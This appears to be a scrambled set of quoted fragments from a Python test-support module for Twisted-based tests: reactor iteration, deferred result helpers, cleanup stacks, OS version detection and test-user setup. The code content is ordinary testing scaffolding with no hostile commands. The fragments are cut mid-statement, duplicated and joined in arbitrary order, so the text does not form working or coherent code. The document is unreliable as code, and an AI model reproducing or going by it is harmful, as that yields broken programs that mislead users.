\"\"\" Return a string", "We delay the import as it will call lsb_release. import", "self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def", "stdlib call to allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase,", "local OS account present. \"\"\" #: User will be created", "super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token)", "reactor run one more time to execute the stop code.", "Look at delayed calls. for delayed in reactor.getDelayedCalls(): # We", "clean. %s: %s' % (location, reason)) if reactor._started: # noqa:cover", "stop it before raising the error. self._shutdownTestReactor() raise AssertionError('Reactor was", "separate unittest2 module. # It comes by default in Python", "range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success", "= drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ and", "swap the arguments. \"\"\" if source not in target: message", "No need to look for other delayed calls. have_callbacks =", "__future__ import print_function from __future__ import division from __future__ import", "Let the reactor run one more time to execute the", "# noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files or folders left", "format is customized for Chevah Nose runner. This is only", "def enterCleanup(self): \"\"\" Called when start using stacked cleanups. \"\"\"", "a path which is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix,", "get a \"root\" deferred. In most tests you would like", "> 0) ): time.sleep(0.01) have_callbacks = True continue # Look", "have_callbacks: raise AssertionError( 'Reactor queue still contains delayed deferred.\\n' '%s'", "at exit. \"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family os_version", "(expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([ '.'.join((t.__module__,", "need for the full thread name excepted_threads = [ 'MainThread',", "chain and the last callback or errback returned a non-L{failure.Failure}.", "from the None test case. \"\"\" success = None for", "TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List of partial thread names", "self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True to enter the", "reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if", "failed deferred is handled by this method, to avoid propagating", "the deferred and return the failure. Usage:: checker = mk.credentialsChecker()", "not the version of the underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history", "path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class", "\"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.threads def", "msg) first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg,", "touched from the test # case itself which run in", "def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout error while executing", "'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that the reactor", "timeout=None, debug=False): \"\"\" Run the reactor until no more delayed", "found %r instead\" % ( deferred, result[0])) def getDeferredResult( self,", "fails, the next cleanups will continue to be called and", "\"\"\" Iterate the reactor for `duration` seconds.. \"\"\" start =", "cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar", "swapped # arguments. if not inspect.isclass(expected_type): expected_type, value = value,", "cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar =", "# noqa:cover if not msg: msg = u'First is str", "return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks of thread", "parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1]) # We", "Return the current failure result of C{deferred} or raise C{self.failException}.", "the first failure is raised. \"\"\" for function, args, kwargs", "started as root and we drop effective user # privileges.", "mode, some test will fail as they # will not", "\" \"found failure result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8',", "the last callback or errback returned a non-L{failure.Failure}. @type deferred:", "was not stopped.') # Look at threads queue. if len(reactor.threadCallQueue)", "% ( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors,", "OS user for file system testing. \"\"\" from chevah.compat.testing import", "shutdown, only if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor()", "timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor):", "super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up OS user for", "be considered as # required to wait for them when", "pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if", "distro_name = ld.id() if distro_name == 'arch': # Arch has", "cls._drop_user: temp_avatar = SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem =", "os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in os.environ and 'USER'", "self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start the", "AssertionError( 'Reactor queue still contains delayed deferred.\\n' '%s' % (self._reactorQueueToString()))", "the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport =", "isinstance(first, text_type) and not isinstance(second, text_type) ): # noqa:cover if", "deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called", "self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\" Run the reactor until", "a real OS account. \"\"\" @classmethod def setUpClass(cls): # FIXME:924:", "considered as # required to wait for them when running", "for cleaning. if cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar() else:", "self).assertRaises if callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as", "be no longer be there. pass if not delayed_calls: break", "not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls():", "not called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the current", "initialize(cls, drop_user): \"\"\" Initialize the testing environment. \"\"\" cls._drop_user =", "% (parts[0], parts[1]) if os_name == 'sunos': parts = platform.release().split('.')", "if ( not isinstance(first, text_type) and isinstance(second, text_type) ): #", "result) \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout)", "If a cleanup fails, the next cleanups will continue to", "u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool", "be called and the first failure is raised. \"\"\" for", "absolute_import from six import text_type from six.moves import range import", "linter. TestCase else: from unittest import TestCase try: # Import", "until no more delayed calls, readers or writers or threads", "'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN", "= _get_hostname() Bunch = Bunch Mock = Mock #: Obsolete.", "name excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor',", "self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if len(threads) > 1: for", "has reached the end of its callback chain and the", "@classmethod def dropPrivileges(cls): '''Drop privileges to normal users.''' if cls._drop_user", "= [False] * (count - 1) iterations.append(True) self.executeReactorUntil( lambda _:", "On Windows it is the `nt` followed by the major", "provided, then this test will fail. @raise SynchronousTestCase.failureException: If the", "default in Python 2.7. if sys.version_info[0:2] < (2, 7): from", "if isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred", "the version. It is not the version of the underlying", "@staticmethod def skipTest(message=''): '''Return a SkipTest exception.''' return SkipTest(message) @property", "= level[0].f_locals['success'] break except KeyError: success_state = None if success_state", "def patchObject(*args, **kwargs): \"\"\" Helper for patching objects. \"\"\" return", "getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred", "result is not one of the types provided, then this", "cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\"", "L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type", "with unicode. \"\"\" if ( isinstance(first, text_type) and not isinstance(second,", "ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case for Chevah tests. Checks that", "\"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context", "failure = AssertionError( 'Reactor took more than %.2f seconds to", "'''Drop privileges to normal users.''' if cls._drop_user == '-': return", "resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for", "self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def", "= ld.version().split('.', 1)[0] return '%s-%s' % (distro_name, distro_version) def _get_cpu_type():", "not isinstance(first, text_type) and isinstance(second, text_type) ): # noqa:cover if", "\"\"\" Remove all delayed calls, readers and writers from the", "[] def enterCleanup(self): \"\"\" Called when start using stacked cleanups.", "'success' member from the test case.''' success_state = None #", "we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an", "= False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if", "instead\" % ( deferred,)) elif not isinstance(result[0], Failure): self.fail( \"Failure", "setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local OS. \"\"\" os_administration.addUser(cls.CREATE_TEST_USER) return", "return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: # When", "isInstance is already defined, but with swapped # arguments. if", "Raise an exception if `value` is not an instance of", "self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second,", "threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue,", "Return current tasks of thread Pool, or [] when threadpool", "import print_function from __future__ import division from __future__ import absolute_import", "# passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self):", "second, msg) first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements,", "prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path,", "from the test case.''' success_state = None # We search", "\"\"\" Run the deferred and return the failure. Usage:: checker", "to get a \"root\" deferred. In most tests you would", "not None: self._reactor_timeout_failure = None # We stop the reactor", "an instance of `expected_type` \"\"\" # In Python 2.7 isInstance", "more than %.2f seconds to execute.' % timeout) self._reactor_timeout_failure =", "Nose runner. This is only called when we run with", "does not change during test and this # should save", "super_assertRaises = super(ChevahTestCase, self).assertRaises if callback is None: return super_assertRaises(exception_class)", "low level method. In most tests you would like to", "for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the", "timeout call. if delayed is self._reactor_timeout_call: continue if not delayed.func:", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result.", "continue # Look at delayed calls. for delayed in reactor.getDelayedCalls():", "and AlreadyCalled are ValueError. # Might be canceled from the", "class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7 class_name", "reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 =", "was not called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the", "Iterate the reactor for `duration` seconds.. \"\"\" start = time.time()", "result def _threadPoolThreads(self): \"\"\" Return current threads from pool, or", "is the # current stack and we don't care about", "= AssertionError( 'Reactor took more than %.2f seconds to execute.'", "\"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup:", "super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if errors: raise", "second, msg, seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element,", "case for tests that need a dedicated local OS account", "and return the result. Usage:: checker = mk.credentialsChecker() credentials =", "Check for a clean reactor at shutdown, only if test", "tests. \"\"\" if not reactor: return try: reactor.removeAll() except (RuntimeError,", "On Linux is the distribution name and the version. On", "checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result", "the reactor. \"\"\" reactor.runUntilCurrent() if debug: # noqa:cover # When", "for `duration` seconds.. \"\"\" start = time.time() self.executeReactorUntil( lambda _:", "import os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import mk", "'success' member from the None test case. \"\"\" success =", "are changing the reactor. from twisted.internet import reactor except ImportError:", "should not be considered as # required to wait for", "memory usage in kilo bytes. \"\"\" if cls.os_family == 'posix':", "AssertionError( \"Expecting type %s, but got %s. %s\" % (", "excepted = True break if not excepted: # noqa:cover raise_failure('readers',", "= mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments)", "of the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport", "L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting", "if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a failure.')", "by normal tests. \"\"\" if not reactor: return try: reactor.removeAll()", "def _caller_success_member(self): '''Retrieve the 'success' member from the test case.'''", "if self._reactor_timeout_failure is not None: self._reactor_timeout_failure = None # We", "name in exception: return True if exception in name: return", "os.uname()[0].lower() if os_name == 'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s'", "any L{failure.Failure} result is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without", "def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update to stdlib to", "returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types", "the reactor. \"\"\" self._timeout_reached = True failure = AssertionError( 'Reactor", "result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current tasks of", "self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug): \"\"\" Does the", "= time.time() self.executeReactorUntil( lambda _: time.time() - start > duration,", "return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case for Chevah", "False for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted =", "[] # In case we are running the test suite", "os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type = process_capabilities.cpu_type ci_name", "import Failure except ImportError: # Twisted support is optional. _SocketWaker", "distribution name and the version. On Windows it is the", "delayed calls, readers and writers from the reactor. This is", "'rhel' distro_version = ld.version().split('.', 1)[0] return '%s-%s' % (distro_name, distro_version)", "self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if errors: raise AssertionError('Cleanup", "raised. \"\"\" for function, args, kwargs in reversed(self.__cleanup__): try: function(*args,", "break if have_callbacks: break if have_callbacks: continue # Look at", "= deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor", "'.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes]) self.fail( \"Failure of type", "def _threadPoolQueue(self): \"\"\" Return current tasks of thread Pool, or", "cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar() else: temp_avatar = DefaultAvatar()", "raise AssertionError('This deferred was not called yet.') def ignoreFailure(self, deferred):", "raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue',", "Failure): raise AssertionError('Deferred is not a failure.') def assertIsNotFailure(self, deferred):", "cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to normal users.''' if", "does not exists or has no job. \"\"\" if not", "\"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while", "import range import contextlib import inspect import threading import os", "of the underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name", "Deferred from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from", "getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred", "_reactor_timeout_call = None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False", "prefix='', suffix=''): \"\"\" Return (path, segments) for a path which", "import Bunch from mock import patch, Mock from nose import", "def _isExceptedThread(self, name): \"\"\" Return `True` if is OK for", "if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: #", "AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and isinstance(second, text_type) ):", "None: raise AssertionError('Failed to find \"success\" attribute.') return success_state @staticmethod", "return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all delayed calls,", "import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi", "'').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true':", "debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if debug: #", "[first[key] for key in first_keys] second_values = [second[key] for key", "Check for active jobs in thread pool. if reactor.threadpool: if", "= class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return \"%s -", "reactor run. When prevent_stop=True, the reactor will not be stopped.", "the CI on which the tests are currently executed. \"\"\"", "= [second[key] for key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list)", "all delayed calls from reactor queue. \"\"\" result = []", "deferred): \"\"\" Check that deferred was called. \"\"\" if not", "self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred and", "more time to execute the stop code. reactor.iterate() # Set", "_reactorQueueToString(self): \"\"\" Return a string representation of all delayed calls", "event to stop waiting for a deferred. _reactor_timeout_call = None", "getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in kilo bytes. \"\"\"", "expected_type, value = value, expected_type if not isinstance(value, expected_type): raise", "_CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', )", "self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements,", "cleanTemporaryFolder(cls): \"\"\" Clean all test files from temporary folder. Return", "current Unix timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\"", "L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect - if provided,", "t2 = 0.1 t = reactor.running and t2 reactor.doIteration(t) else:", "non-Linux this is just the os_name. On Linux is the", "want to stop reactor. reactor.stop() # Let the reactor run", "True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the", "import WMI local_wmi = WMI('.') query = ( u'SELECT PeakWorkingSetSize", "last callback or errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>}", "from twisted.python.failure import Failure except ImportError: # Twisted support is", "thread to exist after test is done. \"\"\" for exception", "with -v or we show the error. \"\"\" class_name =", "%s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None,", "need # to wait at least for delayed calls. if", "can happen if we prevent stop in a previous run.", "u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(),", "# FIXME:924: # Disabled when we can not find the", "provided, and the the exception wrapped by the failure result", "str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if (", "AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname():", "os import platform import socket import sys import time from", "current threads from pool, or empty list when threadpool does", "pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads',", "noqa:cover \"\"\" The short description for the test. bla.bla.tests. is", "in timeout, stops the reactor. This will do recursive calls,", "13 result = [] deferred.addBoth(result.append) if not result: self.fail( \"Failure", "called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the current failure", "that we want to stop reactor. reactor.stop() # Let the", "chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def", "delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None: self._reactor_timeout_failure =", "small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the", "protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol", "it and it has reached the end of its callback", "after upgrading to Twisted 13 result = [] deferred.addBoth(result.append) if", "Linux is the distribution name and the version. On Windows", "[] self._teardown_errors = [] self.test_segments = None def tearDown(self): self.callCleanup()", "not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None: self._reactor_timeout_failure", "suffix=''): \"\"\" Return (path, segments) for a path which is", "self.patchObject. Patch = patch _environ_user = None _drop_user = '-'", "For Python below 2.7 we use the separate unittest2 module.", "Iterate the reactor and stop it at the end. \"\"\"", "reactor if it is already started. # This can happen", "os_version = _get_os_version() cpu_type = process_capabilities.cpu_type ci_name = _get_ci_name() CI", "by default in Python 2.7. if sys.version_info[0:2] < (2, 7):", "fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result, has", "is not a failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise assertion", "small delay in steps, # to have a much better", "return result def _threadPoolThreads(self): \"\"\" Return current threads from pool,", "== 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\"", "for thread to exist after test is done. \"\"\" for", "a test reactor run. When prevent_stop=True, the reactor will not", "= LocalFilesystem(avatar=temp_avatar) temp_members = [] for member in (temp_filesystem.getFolderContent(folder_segments)): if", "KeyError): # FIXME:863: # When running threads tests the reactor", "Return a string representation of the delayed call. \"\"\" raw_name", "second_values = [second[key] for key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg,", "self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def", "mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments)", "1 # List of names for delayed calls which should", "return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for", "text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '') raw_name = raw_name.replace('<bound method", "class_name[tests_start:] return \"%s - %s.%s\" % ( self._testMethodName, class_name, self._testMethodName)", "u'First is unicode while second is str for \"%s\".' %", "None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if len(threads)", "\"found success result (%r) instead\" % (deferred, result[0])) elif (expectedExceptionTypes", "else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread from", "L{Deferred<twisted.internet.defer.Deferred>} without a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor", "error. self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') # Look at", "%s' % (location, reason)) if reactor._started: # noqa:cover # Reactor", "LocalFilesystem(avatar=temp_avatar) temp_members = [] for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked", "not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with", "in one tread and from the fixtures/cleanup # code which", "setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None @property", "for testing. \"\"\" self._timeout_reached = False # Set up timeout.", "skip our own timeout call. if delayed is self._reactor_timeout_call: continue", "delayed_call): \"\"\" Return a string representation of the delayed call.", "self._checkTemporaryFiles() threads = threading.enumerate() if len(threads) > 1: for thread", "pass reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel()", "on %r, found %r instead\" % ( deferred, result[0])) def", "for deferred execution, raises error in timeout, stops the reactor.", "first, second, msg=None): \"\"\" Update to stdlib to make sure", "so stop it before raising the error. self._shutdownTestReactor() raise AssertionError('Reactor", "executed in debug mode, some test will fail as they", "error. \"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start", "A L{Deferred<twisted.internet.defer.Deferred>} which has a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>}", "use the separate unittest2 module. # It comes by default", "= [] deferred.addBoth(result.append) if not result: self.fail( \"Success result expected", "followed by the version. It is not the version of", "self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self,", "OK for thread to exist after test is done. \"\"\"", "\"\"\" Helper for patching objects. \"\"\" return patch.object(*args, **kwargs) def", "% ( deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success result expected", "version. return 'arch' if distro_name in ['centos', 'ol']: # Normalize", "\"\"\" Retrieve the 'success' member from the None test case.", "raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active", "all deferred from chained callbacks. result = deferred.result while isinstance(result,", "True if exception in name: return True return False def", "tests, we run with a very small value. reactor.doIteration(0.000001) def", "can not find the home folder path. if not process_capabilities.get_home_folder:", "' u'WHERE Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size =", "know that we want to stop reactor. reactor.stop() # Let", "os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls):", "called. continue delayed_str = self._getDelayedCallName(delayed) is_exception = False for excepted_callback", "one of the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol()", "finally: opened_file.close() return (path, segments) def tempFolder(self, name=None, prefix='', suffix=''):", "system_users, SuperAvatar, ) from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import", "be started as root and we drop effective user #", "on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise", "six import text_type from six.moves import range import contextlib import", "Iterate the reactor. \"\"\" reactor.runUntilCurrent() if debug: # noqa:cover #", "is already defined, but with swapped # arguments. if not", "debug=debug) result = deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\"", "[False] * (count - 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0),", "first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type)", "use this for very high level integration code, where you", "no more delayed calls are scheduled. This will wait for", "cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\" To", "not exists. This should only be called at cleanup as", "reactor. # To not slow down all the tests, we", "failure result of C{deferred} or raise C{self.failException}. @param deferred: A", "= False # Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout,", "error in timeout, stops the reactor. This will do recursive", "'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release()) if os_name", "'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if", "# It comes by default in Python 2.7. if sys.version_info[0:2]", "[] deferred.addBoth(result.append) if not result: self.fail( \"Failure result expected on", "prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug): \"\"\" Does the actual", "delayed calls, readers or writers or threads are in the", "to find \"success\" attribute.') return success_state @staticmethod def patch(*args, **kwargs):", "Start running has consumed the startup events, so we need", "https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt': parts = platform.version().split('.') return", "[] for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError):", "in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\"", "'\\n'.join(errors)))) def shortDescription(self): # noqa:cover \"\"\" The short description for", "failure result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else:", "delayed calls. if have_callbacks: continue if run_once: if have_callbacks: raise", "means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or", "continue if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks = True", "return success def tearDown(self): try: if self._caller_success_member: # Check for", "run the reactor once. This is useful if you have", "for the test. bla.bla.tests. is removed. The format is customized", "reactor last in case some other modules are changing the", "running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker,", "mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args,", "propagating the error into the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result,", "%s - %s' % ( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors,", "# We search starting with second stack, since first stack", "\"\"\" @classmethod def setUpClass(cls): # FIXME:924: # Disabled when we", "%s' % ( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover \"\"\" The", "deferred): \"\"\" Assert that C{deferred} does not have a result", "all test files from 